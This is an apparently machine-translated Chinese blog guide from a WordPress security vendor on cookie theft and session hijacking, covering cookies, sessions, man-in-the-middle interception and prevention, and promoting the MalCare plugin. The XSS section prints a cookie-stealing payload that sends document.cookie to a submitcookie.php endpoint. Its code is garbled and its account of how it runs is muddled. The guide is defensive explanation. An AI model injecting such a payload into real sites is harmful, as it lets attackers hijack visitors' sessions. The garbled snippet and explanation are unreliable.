如何防止 Cookie 竊取和會話劫持？ （最簡單的指南）

您知道您的網站使用 cookie 來存儲機密數據嗎？ 您知道黑客可以輕鬆竊取您的 cookie 嗎？ 這可能會使您的網站和訪問者處於危險之中！

Cookie 存儲各種信息——從客戶的廣告偏好到登錄憑據和信用卡信息。 Cookie 在互聯網上被廣泛使用，它們被盜的頻率非常高。

如果您是 cookie 竊取或會話劫持的受害者，其後果是嚴重的。 您不僅會失去收入和訪客的信任，而且還可能面臨法律問題和巨額罰款！

但不要擔心，因為今天，我們將帶您了解防止這些攻擊所需了解的一切！

在本指南中，我們將首先了解黑客如何竊取 cookie，然後我們將介紹預防措施。

TL;DR ：擔心您的 WordPress 網站？ 您現在可以通過安裝會話劫持和 Cookie 竊取保護插件來保護您的站點。 它會定期掃描您的網站，並在黑客注入任何惡意代碼使他們能夠竊取 cookie 時提醒您。 使用該插件，您可以及時清理黑客攻擊並避免產生影響。

表中的內容

→ 什麼是 Cookie 竊取？

→ 黑客如何使用跨站點腳本 (XSS) 竊取 Cookie 和劫持會話？

→ 如何防止 Cookie 竊取和會話劫持？

→ 網站訪問者可以採取的防止 Cookie 竊取的步驟

什麼是 Cookie 竊取？

正如我們所希望的那樣，偷餅乾並不像孩子把手伸進餅乾罐那麼簡單！ 這是一個複雜的過程，要了解正在發生的事情，我們需要觸及基礎知識。

→ 什麼是 Cookie？

您可以將 cookie 視為微小的數據位。 它存儲有關您與網站互動的信息。 例如，電子商務網站想要跟踪客戶的旅程——搜索的產品、購買的產品、購物車中遺棄的物品，或者他們訪問了哪些頁面。

這為商店提供了有關客戶偏好、哪些頁面訪問最多、用戶在頁面上停留多長時間等的分析信息。然後他們可以使用這些信息根據客戶的偏好定製網站上顯示的內容。

Cookie 使網站所有者能夠深入了解哪些有效，哪些無效。 這有助於他們確定需要在其網站上更改或改進的內容。

Cookie 還用於向用戶顯示相關廣告。 當您訪問網站時，您會注意到正在顯示的廣告。

這些廣告通常反映您最近的搜索歷史。 例如，如果您在 Google 上搜索“筆記本電腦”，您會發現所有網站上的廣告都向您展示戴爾的廣告。 這些廣告不是網站的一部分，而是由 Google Adsense 等服務處理的。

Cookies 為網站所有者和用戶提供便利。 它可以提高參與度並帶來更多銷售，這對網站所有者來說非常有用。 對於買家而言，cookie 可幫助他們在網站上獲得更個性化的體驗或看到更相關的廣告。

但是有很多缺點，我們稍後會討論。

[返回頂部↑ ]

→ 什麼是瀏覽器會話和會話 ID？

當您登錄網站時，您的計算機和該網站之間會創建一個會話。

例如，當您登錄 Facebook 時，會話開始。 這允許您繼續使用 Facebook（即使您關閉並重新打開網絡瀏覽器），直到您單擊“註銷”並結束會話。

如果未創建會話，則每次需要新數據時都需要繼續登錄。 例如，如果您想離開您的 Facebook 新聞提要並查看朋友的個人資料頁面，您將退出 Facebook，並且需要再次輸入您的憑據才能登錄並查看朋友的個人資料。

這就是為什麼需要會話的原因。 它使您保持登錄狀態，以便您可以繼續瀏覽不同的網頁並瀏覽網站。

這裡需要特別注意的是，每個會話都會生成一組 cookie。 我們可以稱這些會話 cookie。 每個會話 cookie 都有一個唯一的會話 ID。

網站使用此 ID 對用戶進行身份驗證並建立可信連接。

例如，要登錄 Facebook，您需要輸入您的用戶名和密碼。 接下來，創建一個具有唯一 ID 的會話。 您向 Facebook 網站提出的任何請求都將使用此 ID 進行身份驗證。 因此，當您想要查看不同的頁面時，您將向 Facebook 服務器發送請求以顯示該頁面。 Facebook 驗證 ID 並顯示您希望看到的內容。

現在，黑客可以劫持您的會話並濫用此受信任的連接。 他們可以代表您發送惡意請求。 讓我們看看如何。

[返回頂部↑ ]

→ Cookie 有哪些安全問題？

生成 cookie 時，它們只能由您（網站所有者）查看。 沒有其他網站可以查看您的 cookie。 它們只屬於你。

但是這些 cookie 在互聯網上傳播。 它們由廣告服務和分析服務使用。 因此，這些 cookie 在全球範圍內從一個服務器跳到另一個服務器。 如果連接不安全，黑客可以輕鬆攔截和竊取這些 cookie。

現在，您可能會認為，如果黑客設法獲取有關您的購物偏好的信息，那有什麼大不了的，對吧？

問題是 cookie 存儲的不僅僅是關於您的購物偏好的信息。 它還存儲銀行詳細信息和個人信息，例如您的送貨地址和聯繫方式。

如果此類信息落入壞人之手，可能會被濫用於欺詐活動。

黑客竊取 cookie 的最常見方式之一是他們是否使用與您相同的 wifi。 這種 wifi 黑客攻擊稱為中間人攻擊，只有當兩者都連接到同一無線網絡時才會發生。 這就是為什麼建議永遠不要使用不安全或被許多人使用的公共 wifi 。 這也可能發生在同一計算機網絡中的用戶身上。

其他一些方法包括數據包嗅探和利用稱為跨站點腳本的漏洞。 今天，我們將向您詳細介紹 XSS cookie 竊取的工作原理。

[返回頂部↑ ]

黑客如何使用跨站點腳本 (XSS) 竊取 Cookie 和劫持會話？

為了向您展示黑客如何使用跨站點腳本 (XSS) 攻擊竊取 cookie，我們將使用一個示例。 假設您訪問的網站上有評論部分。

您所做的任何評論都將被發送到網站的數據庫。 理想情況下，此評論部分應配置為僅接受純英語文本。 但是，如果它也接受特殊字符，這會使它容易受到 XSS 攻擊。

黑客可以輸入他們自己的惡意代碼，這些代碼將被發送到數據庫。 一旦進入，代碼將被執行。 黑客可以將大量代碼插入網站以運行各種惡意活動，例如創建新的網站管理員或竊取 cookie。

要竊取 cookie，黑客可以輸入以下代碼：

注意：這不是關於如何竊取 cookie 的教程。 本文旨在讓網站所有者了解黑客如何竊取 cookie。 我們不建議您進行任何非法活動。

[php]

文檔.write('<img src=& amp;amp;amp;quot;http://localhost/submitcookie.php?cookie ='

+ escape(document.cookie) + '" />）；

[/php]

在評論部分，此代碼將顯示為圖像。 如果您（作為訪問者）單擊它，您將看到顯示的圖像。 但不僅僅是發生了。

當您單擊圖像時，此 PHP 文件會靜默執行代碼並獲取您的會話 cookie 和會話 ID。

現在黑客可以重新創建您的會話並在該網站上冒充您。 他們可以進行多種惡意行為。 例如，如果您的 cookie 包含您的信用卡或任何其他支付信息，他們就可以進行購買。

幸運的是，有一些預防措施可以保護網站所有者及其訪問者免受這些黑客攻擊。

[ss_click_to_tweet tweet=”切勿點擊網站評論部分和電子郵件中的可疑鏈接。 你可能會成為 cookie 盜竊的受害者。” content=”切勿點擊網站評論部分和電子郵件中的可疑鏈接。 你可能會成為 cookie 盜竊的受害者。” 樣式=“默認”]

[返回頂部↑ ]

如何防止 Cookie 竊取和會話劫持？

有兩方在防止 cookie 盜竊和會話劫持方面發揮作用——網站所有者和訪問者。 我們將討論雙方的預防措施。

→網站所有者可以採取的措施來防止 Cookie 竊取

作為網站所有者，如果沒有安全分析師為您處理一切，您需要實施以下預防措施：

1.安裝SSL證書

數據在用戶的瀏覽器和您的網絡服務器之間不斷傳輸。 如果沒有 SSL，此數據（cookie）將以純文本形式發送。 如果黑客攔截了這些數據，他們可以簡單地讀取它。 因此，如果它包含登錄憑據，它將被公開。

SSL（安全套接字層）將在數據傳輸之前對其進行加密。 因此，即使黑客設法竊取了它，他們也無法讀取數據。

您可以通過網絡託管公司或 SSL 提供商獲取 SSL 證書。 您還可以從 Let's Encrypt 獲得基本的免費 SSL 證書。

2.安裝安全插件

在您的網站上保持WordPress 安全插件（例如 MalCare）處於活動狀態。 該插件的防火牆將阻止對您網站的黑客攻擊並阻止惡意 IP 地址。 此外，它會定期掃描您的網站，並在黑客輸入任何惡意代碼時提醒您。 您可以立即清理您的網站。 這將幫助您在此類黑客攻擊造成任何傷害之前立即檢測並刪除它們。

3.更新您的網站

始終讓您的網站保持最新狀態，這包括 WordPress 安裝、主題和插件。 在過時的軟件上運行會在您的網站上打開許多黑客可以利用的漏洞。 確保在有新更新可用時更新您的站點。

這些更新不僅包含新功能和錯誤修復，而且還會不時修復安全漏洞。

4. 強化你的網站

WordPress.org 推薦了您應該在您的網站上實施的某些網站強化措施。 這包括使用強而獨特的用戶名和強密碼，阻止在未知文件夾中執行 PHP，在主題和插件中禁用文件編輯器等等。 現在，這對您來說可能聽起來像是行話，因此我們創建了一個深入的 WordPress 強化分步指南，您可以按照該指南進行操作。

[返回頂部↑ ]

網站訪問者可以採取的防止 Cookie 竊取的步驟

作為網站訪問者，您不必盲目相信網站已經採取了適當的安全措施。 您可以使用以下網絡安全協議來保護自己。

1.安裝有效的防病毒軟件

確保您用於訪問互聯網的設備安裝了反惡意軟件。 如果在您訪問惡意網站時檢測到惡意軟件，這將提醒您。 它還會刪除您可能不小心下載或安裝在系統上的所有惡意軟件。

2. 永遠不要點擊可疑鏈接

黑客通過網站上的評論部分和電子郵件來鎖定用戶。 避免點擊不受信任的鏈接，尤其是那些以誘人的優惠或折扣吸引您的鏈接。

3.避免存儲敏感數據

在購物網站上存儲信用卡信息可以使結帳更加快捷方便。 在 Google Chrome 等網絡瀏覽器上保存密碼以自動登錄網站，無需記住密碼！

但這一切都伴隨著被盜的高風險。 最好永遠不要在網站上存儲敏感數據。 它可能會為您節省幾秒鐘，但也會讓您面臨被攻擊的風險。

4. 清除 Cookie

您可以定期清除 cookie，以清除存儲在 Google Chrome 等瀏覽器中的任何敏感信息。 訪問歷史記錄 > 清除瀏覽歷史記錄。 在這裡，勾選“Cookie 和其他站點數據”複選框。

選擇時間範圍“所有時間”或根據您的喜好選擇一個。 接下來，單擊“清除數據”，cookie 將從您的瀏覽器歷史記錄中刪除。

這使我們結束了 cookie 竊取。 我們希望本文能幫助您更好地了解到底發生了什麼以及如何預防它。

[ss_click_to_tweet tweet=”這份來自 MalCare 的指南幫助我了解了 cookie 竊取以及如何對其採取預防措施。 一探究竟。” content=”這份來自 MalCare 的指南幫助我了解了 cookie 竊取以及如何對其採取預防措施。 一探究竟。” 樣式=“默認”]

[返回頂部↑ ]

最後的想法

作為網站所有者，您需要採取保護措施來保護您自己以及您的訪問者、客戶和客戶的利益。 但我們明白，建立網站並對其進行管理是一項艱鉅的任務。

有無數的事情需要處理，這就是為什麼 WordPress 安全性往往退居二線的原因。

但是忽視您網站的安全方面可能會對您的所有其他努力造成災難性的後果。

MalCare 安全插件是一個簡單、快速和高效的解決方案。 您可以將其視為您僱用的保安人員。 它將全天候工作以定期掃描您的網站並保護其免受攻擊。 您可以放心，您的網站是安全的。

使用MalCare保護您的 WordPress 網站！